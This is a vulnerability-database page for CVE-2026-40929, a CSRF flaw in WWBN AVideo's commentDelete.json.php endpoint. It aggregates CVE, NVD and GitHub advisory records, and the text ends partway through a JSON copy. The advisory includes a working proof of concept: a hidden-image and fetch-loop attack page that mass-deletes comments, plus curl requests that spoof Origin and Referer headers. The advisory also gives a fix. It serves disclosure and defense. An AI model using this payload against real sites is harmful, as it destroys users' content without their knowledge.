Vulnerability-Lookup

CVE-2026-40929 (GCVE-0-2026-40929)

Vulnerability from cvelistv5 – Published: 2026-04-21 22:16 – Updated: 2026-04-22 17:58

Title

WWBN AVideo's missing CSRF protection in objects/commentDelete.json.php enables mass comment deletion against moderators and content creators

Summary

WWBN AVideo is an open source video platform. In versions 29.0 and prior, `objects/commentDelete.json.php` is a state-mutating JSON endpoint that deletes comments but performs no CSRF validation. It does not call `forbidIfIsUntrustedRequest()`, does not verify a CSRF/global token, and does not check `Origin`/`Referer`. Because AVideo intentionally sets `session.cookie_samesite=None` (to support cross-origin embed players), a cross-site request from any attacker-controlled page automatically carries the victim's `PHPSESSID`. Any authenticated victim who has authority to delete one or more comments (site moderators, video owners, and comment authors) can be tricked into deleting comments en masse simply by visiting an attacker page. Commit 184f36b1896f3364f864f17c1acca3dd8df3af27 contains a fix.

Severity ?

5.4 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L

CWE

CWE-352 - Cross-Site Request Forgery (CSRF)

Assigner

GitHub_M

References

URL

Tags

	https://github.com/WWBN/AVideo/security/advisorie…	x_refsource_CONFIRM
	https://github.com/WWBN/AVideo/commit/184f36b1896…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	WWBN	AVideo	Affected: <= 29.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-40929",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-04-22T17:58:28.716992Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-04-22T17:58:51.253Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-8qm8-g55h-xmqr"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "AVideo",
          "vendor": "WWBN",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c= 29.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "WWBN AVideo is an open source video platform. In versions 29.0 and prior, `objects/commentDelete.json.php` is a state-mutating JSON endpoint that deletes comments but performs no CSRF validation. It does not call `forbidIfIsUntrustedRequest()`, does not verify a CSRF/global token, and does not check `Origin`/`Referer`. Because AVideo intentionally sets `session.cookie_samesite=None` (to support cross-origin embed players), a cross-site request from any attacker-controlled page automatically carries the victim\u0027s `PHPSESSID`. Any authenticated victim who has authority to delete one or more comments (site moderators, video owners, and comment authors) can be tricked into deleting comments en masse simply by visiting an attacker page. Commit 184f36b1896f3364f864f17c1acca3dd8df3af27 contains a fix."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-352",
              "description": "CWE-352: Cross-Site Request Forgery (CSRF)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-04-21T22:16:54.781Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/WWBN/AVideo/security/advisories/GHSA-8qm8-g55h-xmqr",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-8qm8-g55h-xmqr"
        },
        {
          "name": "https://github.com/WWBN/AVideo/commit/184f36b1896f3364f864f17c1acca3dd8df3af27",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/WWBN/AVideo/commit/184f36b1896f3364f864f17c1acca3dd8df3af27"
        }
      ],
      "source": {
        "advisory": "GHSA-8qm8-g55h-xmqr",
        "discovery": "UNKNOWN"
      },
      "title": "WWBN AVideo\u0027s missing CSRF protection in objects/commentDelete.json.php enables mass comment deletion against moderators and content creators"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-40929",
    "datePublished": "2026-04-21T22:16:54.781Z",
    "dateReserved": "2026-04-15T20:40:15.517Z",
    "dateUpdated": "2026-04-22T17:58:51.253Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-40929",
      "date": "2026-04-22",
      "epss": "0.00015",
      "percentile": "0.03133"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-40929\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-04-21T23:16:20.433\",\"lastModified\":\"2026-04-22T21:23:52.620\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"WWBN AVideo is an open source video platform. In versions 29.0 and prior, `objects/commentDelete.json.php` is a state-mutating JSON endpoint that deletes comments but performs no CSRF validation. It does not call `forbidIfIsUntrustedRequest()`, does not verify a CSRF/global token, and does not check `Origin`/`Referer`. Because AVideo intentionally sets `session.cookie_samesite=None` (to support cross-origin embed players), a cross-site request from any attacker-controlled page automatically carries the victim\u0027s `PHPSESSID`. Any authenticated victim who has authority to delete one or more comments (site moderators, video owners, and comment authors) can be tricked into deleting comments en masse simply by visiting an attacker page. Commit 184f36b1896f3364f864f17c1acca3dd8df3af27 contains a fix.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L\",\"baseScore\":5.4,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"LOW\"},\"exploitabilityScore\":2.8,\"impactScore\":2.5}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-352\"}]}],\"references\":[{\"url\":\"https://github.com/WWBN/AVideo/commit/184f36b1896f3364f864f17c1acca3dd8df3af27\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/WWBN/AVideo/security/advisories/GHSA-8qm8-g55h-xmqr\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/WWBN/AVideo/security/advisories/GHSA-8qm8-g55h-xmqr\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-40929\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-04-22T17:58:28.716992Z\"}}}], \"references\": [{\"url\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-8qm8-g55h-xmqr\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-04-22T17:58:47.886Z\"}}], \"cna\": {\"title\": \"WWBN AVideo\u0027s missing CSRF protection in objects/commentDelete.json.php enables mass comment deletion against moderators and content creators\", \"source\": {\"advisory\": \"GHSA-8qm8-g55h-xmqr\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 5.4, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"LOW\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"WWBN\", \"product\": \"AVideo\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c= 29.0\"}]}], \"references\": [{\"url\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-8qm8-g55h-xmqr\", \"name\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-8qm8-g55h-xmqr\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/WWBN/AVideo/commit/184f36b1896f3364f864f17c1acca3dd8df3af27\", \"name\": \"https://github.com/WWBN/AVideo/commit/184f36b1896f3364f864f17c1acca3dd8df3af27\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"WWBN AVideo is an open source video platform. In versions 29.0 and prior, `objects/commentDelete.json.php` is a state-mutating JSON endpoint that deletes comments but performs no CSRF validation. It does not call `forbidIfIsUntrustedRequest()`, does not verify a CSRF/global token, and does not check `Origin`/`Referer`. Because AVideo intentionally sets `session.cookie_samesite=None` (to support cross-origin embed players), a cross-site request from any attacker-controlled page automatically carries the victim\u0027s `PHPSESSID`. Any authenticated victim who has authority to delete one or more comments (site moderators, video owners, and comment authors) can be tricked into deleting comments en masse simply by visiting an attacker page. Commit 184f36b1896f3364f864f17c1acca3dd8df3af27 contains a fix.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-352\", \"description\": \"CWE-352: Cross-Site Request Forgery (CSRF)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-04-21T22:16:54.781Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-40929\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-04-22T17:58:51.253Z\", \"dateReserved\": \"2026-04-15T20:40:15.517Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-04-21T22:16:54.781Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-40929

Vulnerability from fkie_nvd - Published: 2026-04-21 23:16 - Updated: 2026-04-22 21:23

Severity ?

5.4 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/WWBN/AVideo/commit/184f36b1896f3364f864f17c1acca3dd8df3af27
	security-advisories@github.com	https://github.com/WWBN/AVideo/security/advisories/GHSA-8qm8-g55h-xmqr
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/WWBN/AVideo/security/advisories/GHSA-8qm8-g55h-xmqr

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "WWBN AVideo is an open source video platform. In versions 29.0 and prior, `objects/commentDelete.json.php` is a state-mutating JSON endpoint that deletes comments but performs no CSRF validation. It does not call `forbidIfIsUntrustedRequest()`, does not verify a CSRF/global token, and does not check `Origin`/`Referer`. Because AVideo intentionally sets `session.cookie_samesite=None` (to support cross-origin embed players), a cross-site request from any attacker-controlled page automatically carries the victim\u0027s `PHPSESSID`. Any authenticated victim who has authority to delete one or more comments (site moderators, video owners, and comment authors) can be tricked into deleting comments en masse simply by visiting an attacker page. Commit 184f36b1896f3364f864f17c1acca3dd8df3af27 contains a fix."
    }
  ],
  "id": "CVE-2026-40929",
  "lastModified": "2026-04-22T21:23:52.620",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "LOW",
          "baseScore": 5.4,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "LOW",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 2.5,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-04-21T23:16:20.433",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/WWBN/AVideo/commit/184f36b1896f3364f864f17c1acca3dd8df3af27"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-8qm8-g55h-xmqr"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-8qm8-g55h-xmqr"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Awaiting Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-352"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-8QM8-G55H-XMQR

Vulnerability from github – Published: 2026-04-14 23:13 – Updated: 2026-04-14 23:13

Summary

WWBN AVideo is missing CSRF protection in objects/commentDelete.json.php enables mass comment deletion against moderators and content creators

Details

Summary

objects/commentDelete.json.php is a state-mutating JSON endpoint that deletes comments but performs no CSRF validation. It does not call forbidIfIsUntrustedRequest(), does not verify a CSRF/global token, and does not check Origin/Referer. Because AVideo intentionally sets session.cookie_samesite=None (to support cross-origin embed players), a cross-site request from any attacker-controlled page automatically carries the victim's PHPSESSID. Any authenticated victim who has authority to delete one or more comments (site moderators, video owners, and comment authors) can be tricked into deleting comments en masse simply by visiting an attacker page.

Details

Vulnerable endpoint: `objects/commentDelete.json.php`

// objects/commentDelete.json.php:1-35
<?php
header('Content-Type: application/json');
global $global, $config;
if (!isset($global['systemRootPath'])) {
    require_once '../videos/configuration.php';
}
require_once $global['systemRootPath'] . 'objects/comment.php';

$obj = new stdClass();
$obj->error = true;
$obj->msg = '';
$obj->id = intval(@$_REQUEST['id']);      // <-- GET or POST
$obj->status = false;

if (empty($obj->id)) {
    $obj->id = intval(@$_REQUEST['comments_id']);
}

if (empty($obj->id)) {
    $obj->msg = __("ID can not be empty");
    die(_json_encode($obj));
}

$objC = new Comment("", 0, $obj->id);
$obj->videos_id = $objC->getVideos_id();
$obj->status = $objC->delete();           // <-- destructive action, no CSRF check
...

No forbidIfIsUntrustedRequest(), no verifyToken(), no token/nonce parameter, no Origin/Referer validation. The handler accepts $_REQUEST, so the request may be delivered as GET (e.g. via <img src>) or POST (e.g. via an auto-submitting form / fetch).

Authorization inside `Comment::delete()` does not stop CSRF

// objects/comment.php:147-159
public function delete() {
    if (!self::userCanAdminComment($this->id)) {
        return false;
    }
    ...
    $sql = "DELETE FROM comments WHERE id = ?";
    ...
    return sqlDAL::writeSql($sql, "i", [$this->id]);
}

// objects/comment.php:316-332
public static function userCanAdminComment($comments_id) {
    if (!User::isLogged()) { return false; }
    if (Permissions::canAdminComment()) { return true; }   // site moderator
    $obj = new Comment("", 0, $comments_id);
    if ($obj->users_id == User::getId()) { return true; }  // comment owner
    $video = new Video("", "", $obj->videos_id);
    if ($video->getUsers_id() == User::getId()) { return true; } // video owner
    return false;
}

This check is exactly what CSRF abuses: it asks "is the session user allowed to delete this comment?" In a CSRF attack, the session user is the victim, and yes — the victim is allowed. So the check grants the request.

Site-wide cookie policy makes cross-site delivery reliable

// objects/include_config.php:139-146
if ($isHTTPS) {
    // SameSite=None is intentional: AVideo supports cross-origin iframe embedding
    // where users must stay authenticated (e.g. video players on third-party sites).
    // Setting Lax would break that use case. All state-mutating endpoints that are
    // vulnerable to CSRF must instead enforce a short-lived globalToken (verifyToken).
    ini_set('session.cookie_samesite', 'None');
    ini_set('session.cookie_secure', '1');
}

The in-source comment is explicit: because AVideo intentionally opts out of SameSite protection, every state-mutating endpoint is responsible for its own CSRF defense. commentDelete.json.php forgets to apply it. The canonical example that does get it right is objects/userUpdate.json.php:18:

// objects/userUpdate.json.php:13-18
if (!User::isLogged()) {
    $obj->msg = __("Is not logged");
    die(json_encode($obj));
}

forbidIfIsUntrustedRequest();   // <-- what commentDelete.json.php is missing

A repository-wide grep for forbidIfIsUntrustedRequest yields only objects/userUpdate.json.php and the function definition itself — no shared middleware exists, and no bootstrap in configuration.php / include_config.php wraps endpoints with a CSRF check.

Attacker model / victim value

Site moderators (any account with Permissions::canAdminComment()): full-site comment deletion oracle.
Video creators (channel owners): deletion oracle for every comment on their own videos.
Comment authors: only their own comments (self-DoS, low value).

The first two classes make this a real integrity/availability attack on community content.

PoC

Assume the target AVideo instance runs at https://victim.example.com and the victim is a logged-in moderator (or any video owner). The attacker hosts:

<!-- https://attacker.example/mass-delete.html -->
<!doctype html>
<html><body>
<h1>Cute kittens</h1>
<!-- GET variant (works because the endpoint uses $_REQUEST): -->
<img src="https://victim.example.com/objects/commentDelete.json.php?comments_id=1" style="display:none">
<img src="https://victim.example.com/objects/commentDelete.json.php?comments_id=2" style="display:none">
<img src="https://victim.example.com/objects/commentDelete.json.php?comments_id=3" style="display:none">
<!-- ... up to N -->

<!-- POST variant (same result, reaches the POST code path the legit UI uses): -->
<script>
for (let i = 1; i <= 10000; i++) {
  fetch("https://victim.example.com/objects/commentDelete.json.php", {
    method: "POST",
    credentials: "include",
    headers: {"Content-Type": "application/x-www-form-urlencoded"},
    body: "comments_id=" + i
  });
}
</script>
</body></html>

Manual verification of the server-side handler with the victim's own cookie (demonstrates that the endpoint itself performs the delete with no token):

# 1. Log in as a moderator and capture PHPSESSID
curl -c cookies.txt -d 'user=moderator&pass=pass' \
  https://victim.example.com/objects/userLogin.json.php

# 2. Call the endpoint with nothing but the session cookie and a comments_id.
#    No CSRF token, no Referer/Origin matching the site.
curl -b cookies.txt \
  -H 'Origin: https://attacker.example' \
  -H 'Referer: https://attacker.example/mass-delete.html' \
  'https://victim.example.com/objects/commentDelete.json.php?comments_id=1'
# -> {"error":false,"msg":"","id":1,"status":true,"videos_id":...}

The {"status":true,"error":false} response confirms the row was deleted; compare with objects/userUpdate.json.php under the same Origin/Referer, which returns the "Invalid Request" forbidden page from forbidIfIsUntrustedRequest().

Impact

Cross-site mass deletion of comments.
Against a site moderator (Permissions::canAdminComment()), the attacker can permanently delete every comment on the platform — a severe content-integrity and availability hit on the community layer.
Against any channel owner, the attacker can wipe all discussion under that creator's videos, a targeted reputation / engagement attack (e.g., silence dissent, silence evidence of prior posts).
The attack only requires luring a logged-in victim to any page that can fetch/embed/submit — a forum post, a compromised ad, a link in email, a rogue embed.
No credential compromise is required; the attack does not leak data, but it destroys it.
Because SameSite=None is a deliberate, documented product decision, browser-side defenses do not intervene.

Recommended Fix

Apply the project's own prescribed CSRF pattern to the handler. Two layers are appropriate:

Require an authenticated session and reject untrusted-origin requests (same treatment as userUpdate.json.php).
Restrict the method to POST so drive-by <img> and navigational GET deliveries cannot reach the sink.

// objects/commentDelete.json.php
<?php
header('Content-Type: application/json');
global $global, $config;
if (!isset($global['systemRootPath'])) {
    require_once '../videos/configuration.php';
}
require_once $global['systemRootPath'] . 'objects/comment.php';

// --- added CSRF defense ---
if (!User::isLogged()) {
    die(_json_encode((object)['error' => true, 'msg' => __('Is not logged')]));
}
forbidIfIsUntrustedRequest();                       // Referer/Origin gate
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {         // no $_REQUEST drive-by
    die(_json_encode((object)['error' => true, 'msg' => 'POST required']));
}
// --- end added ---

$obj = new stdClass();
$obj->error = true;
$obj->msg = '';
$obj->id = intval(@$_POST['id']);
$obj->status = false;

if (empty($obj->id)) {
    $obj->id = intval(@$_POST['comments_id']);
}
...

Stronger (recommended): also require a short-lived global token via verifyToken() as the in-source comment in objects/include_config.php prescribes, and audit every other objects/*.json.php handler that performs a write — the same omission likely affects additional endpoints and should be handled project-wide, ideally through a shared bootstrap that enforces forbidIfIsUntrustedRequest() for any json.php that mutates state.

Severity ?

5.4 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "wwbn/avideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "29.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-352"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-14T23:13:08Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "## Summary\n\n`objects/commentDelete.json.php` is a state-mutating JSON endpoint that deletes comments but performs no CSRF validation. It does not call `forbidIfIsUntrustedRequest()`, does not verify a CSRF/global token, and does not check `Origin`/`Referer`. Because AVideo intentionally sets `session.cookie_samesite=None` (to support cross-origin embed players), a cross-site request from any attacker-controlled page automatically carries the victim\u0027s `PHPSESSID`. Any authenticated victim who has authority to delete one or more comments (site moderators, video owners, and comment authors) can be tricked into deleting comments en masse simply by visiting an attacker page.\n\n## Details\n\n### Vulnerable endpoint: `objects/commentDelete.json.php`\n\n```php\n// objects/commentDelete.json.php:1-35\n\u003c?php\nheader(\u0027Content-Type: application/json\u0027);\nglobal $global, $config;\nif (!isset($global[\u0027systemRootPath\u0027])) {\n    require_once \u0027../videos/configuration.php\u0027;\n}\nrequire_once $global[\u0027systemRootPath\u0027] . \u0027objects/comment.php\u0027;\n\n$obj = new stdClass();\n$obj-\u003eerror = true;\n$obj-\u003emsg = \u0027\u0027;\n$obj-\u003eid = intval(@$_REQUEST[\u0027id\u0027]);      // \u003c-- GET or POST\n$obj-\u003estatus = false;\n\nif (empty($obj-\u003eid)) {\n    $obj-\u003eid = intval(@$_REQUEST[\u0027comments_id\u0027]);\n}\n\nif (empty($obj-\u003eid)) {\n    $obj-\u003emsg = __(\"ID can not be empty\");\n    die(_json_encode($obj));\n}\n\n$objC = new Comment(\"\", 0, $obj-\u003eid);\n$obj-\u003evideos_id = $objC-\u003egetVideos_id();\n$obj-\u003estatus = $objC-\u003edelete();           // \u003c-- destructive action, no CSRF check\n...\n```\n\nNo `forbidIfIsUntrustedRequest()`, no `verifyToken()`, no token/nonce parameter, no `Origin`/`Referer` validation. The handler accepts `$_REQUEST`, so the request may be delivered as `GET` (e.g. via `\u003cimg src\u003e`) or `POST` (e.g. via an auto-submitting form / `fetch`).\n\n### Authorization inside `Comment::delete()` does not stop CSRF\n\n```php\n// objects/comment.php:147-159\npublic function delete() {\n    if (!self::userCanAdminComment($this-\u003eid)) {\n        return false;\n    }\n    ...\n    $sql = \"DELETE FROM comments WHERE id = ?\";\n    ...\n    return sqlDAL::writeSql($sql, \"i\", [$this-\u003eid]);\n}\n\n// objects/comment.php:316-332\npublic static function userCanAdminComment($comments_id) {\n    if (!User::isLogged()) { return false; }\n    if (Permissions::canAdminComment()) { return true; }   // site moderator\n    $obj = new Comment(\"\", 0, $comments_id);\n    if ($obj-\u003eusers_id == User::getId()) { return true; }  // comment owner\n    $video = new Video(\"\", \"\", $obj-\u003evideos_id);\n    if ($video-\u003egetUsers_id() == User::getId()) { return true; } // video owner\n    return false;\n}\n```\n\nThis check is exactly what CSRF abuses: it asks \"is the session user allowed to delete this comment?\" In a CSRF attack, the session user is the victim, and yes \u2014 the victim is allowed. So the check grants the request.\n\n### Site-wide cookie policy makes cross-site delivery reliable\n\n```php\n// objects/include_config.php:139-146\nif ($isHTTPS) {\n    // SameSite=None is intentional: AVideo supports cross-origin iframe embedding\n    // where users must stay authenticated (e.g. video players on third-party sites).\n    // Setting Lax would break that use case. All state-mutating endpoints that are\n    // vulnerable to CSRF must instead enforce a short-lived globalToken (verifyToken).\n    ini_set(\u0027session.cookie_samesite\u0027, \u0027None\u0027);\n    ini_set(\u0027session.cookie_secure\u0027, \u00271\u0027);\n}\n```\n\nThe in-source comment is explicit: because AVideo intentionally opts out of SameSite protection, every state-mutating endpoint is responsible for its own CSRF defense. `commentDelete.json.php` forgets to apply it. The canonical example that does get it right is `objects/userUpdate.json.php:18`:\n\n```php\n// objects/userUpdate.json.php:13-18\nif (!User::isLogged()) {\n    $obj-\u003emsg = __(\"Is not logged\");\n    die(json_encode($obj));\n}\n\nforbidIfIsUntrustedRequest();   // \u003c-- what commentDelete.json.php is missing\n```\n\nA repository-wide grep for `forbidIfIsUntrustedRequest` yields only `objects/userUpdate.json.php` and the function definition itself \u2014 no shared middleware exists, and no bootstrap in `configuration.php` / `include_config.php` wraps endpoints with a CSRF check.\n\n### Attacker model / victim value\n\n- **Site moderators** (any account with `Permissions::canAdminComment()`): full-site comment deletion oracle.\n- **Video creators** (channel owners): deletion oracle for every comment on their own videos.\n- **Comment authors**: only their own comments (self-DoS, low value).\n\nThe first two classes make this a real integrity/availability attack on community content.\n\n## PoC\n\nAssume the target AVideo instance runs at `https://victim.example.com` and the victim is a logged-in moderator (or any video owner). The attacker hosts:\n\n```html\n\u003c!-- https://attacker.example/mass-delete.html --\u003e\n\u003c!doctype html\u003e\n\u003chtml\u003e\u003cbody\u003e\n\u003ch1\u003eCute kittens\u003c/h1\u003e\n\u003c!-- GET variant (works because the endpoint uses $_REQUEST): --\u003e\n\u003cimg src=\"https://victim.example.com/objects/commentDelete.json.php?comments_id=1\" style=\"display:none\"\u003e\n\u003cimg src=\"https://victim.example.com/objects/commentDelete.json.php?comments_id=2\" style=\"display:none\"\u003e\n\u003cimg src=\"https://victim.example.com/objects/commentDelete.json.php?comments_id=3\" style=\"display:none\"\u003e\n\u003c!-- ... up to N --\u003e\n\n\u003c!-- POST variant (same result, reaches the POST code path the legit UI uses): --\u003e\n\u003cscript\u003e\nfor (let i = 1; i \u003c= 10000; i++) {\n  fetch(\"https://victim.example.com/objects/commentDelete.json.php\", {\n    method: \"POST\",\n    credentials: \"include\",\n    headers: {\"Content-Type\": \"application/x-www-form-urlencoded\"},\n    body: \"comments_id=\" + i\n  });\n}\n\u003c/script\u003e\n\u003c/body\u003e\u003c/html\u003e\n```\n\nManual verification of the server-side handler with the victim\u0027s own cookie (demonstrates that the endpoint itself performs the delete with no token):\n\n```bash\n# 1. Log in as a moderator and capture PHPSESSID\ncurl -c cookies.txt -d \u0027user=moderator\u0026pass=pass\u0027 \\\n  https://victim.example.com/objects/userLogin.json.php\n\n# 2. Call the endpoint with nothing but the session cookie and a comments_id.\n#    No CSRF token, no Referer/Origin matching the site.\ncurl -b cookies.txt \\\n  -H \u0027Origin: https://attacker.example\u0027 \\\n  -H \u0027Referer: https://attacker.example/mass-delete.html\u0027 \\\n  \u0027https://victim.example.com/objects/commentDelete.json.php?comments_id=1\u0027\n# -\u003e {\"error\":false,\"msg\":\"\",\"id\":1,\"status\":true,\"videos_id\":...}\n```\n\nThe `{\"status\":true,\"error\":false}` response confirms the row was deleted; compare with `objects/userUpdate.json.php` under the same Origin/Referer, which returns the \"Invalid Request\" forbidden page from `forbidIfIsUntrustedRequest()`.\n\n## Impact\n\n- Cross-site mass deletion of comments.\n- Against a site moderator (`Permissions::canAdminComment()`), the attacker can permanently delete every comment on the platform \u2014 a severe content-integrity and availability hit on the community layer.\n- Against any channel owner, the attacker can wipe all discussion under that creator\u0027s videos, a targeted reputation / engagement attack (e.g., silence dissent, silence evidence of prior posts).\n- The attack only requires luring a logged-in victim to any page that can fetch/embed/submit \u2014 a forum post, a compromised ad, a link in email, a rogue embed.\n- No credential compromise is required; the attack does not leak data, but it destroys it.\n- Because SameSite=None is a deliberate, documented product decision, browser-side defenses do not intervene.\n\n## Recommended Fix\n\nApply the project\u0027s own prescribed CSRF pattern to the handler. Two layers are appropriate:\n\n1. Require an authenticated session and reject untrusted-origin requests (same treatment as `userUpdate.json.php`).\n2. Restrict the method to `POST` so drive-by `\u003cimg\u003e` and navigational `GET` deliveries cannot reach the sink.\n\n```php\n// objects/commentDelete.json.php\n\u003c?php\nheader(\u0027Content-Type: application/json\u0027);\nglobal $global, $config;\nif (!isset($global[\u0027systemRootPath\u0027])) {\n    require_once \u0027../videos/configuration.php\u0027;\n}\nrequire_once $global[\u0027systemRootPath\u0027] . \u0027objects/comment.php\u0027;\n\n// --- added CSRF defense ---\nif (!User::isLogged()) {\n    die(_json_encode((object)[\u0027error\u0027 =\u003e true, \u0027msg\u0027 =\u003e __(\u0027Is not logged\u0027)]));\n}\nforbidIfIsUntrustedRequest();                       // Referer/Origin gate\nif ($_SERVER[\u0027REQUEST_METHOD\u0027] !== \u0027POST\u0027) {         // no $_REQUEST drive-by\n    die(_json_encode((object)[\u0027error\u0027 =\u003e true, \u0027msg\u0027 =\u003e \u0027POST 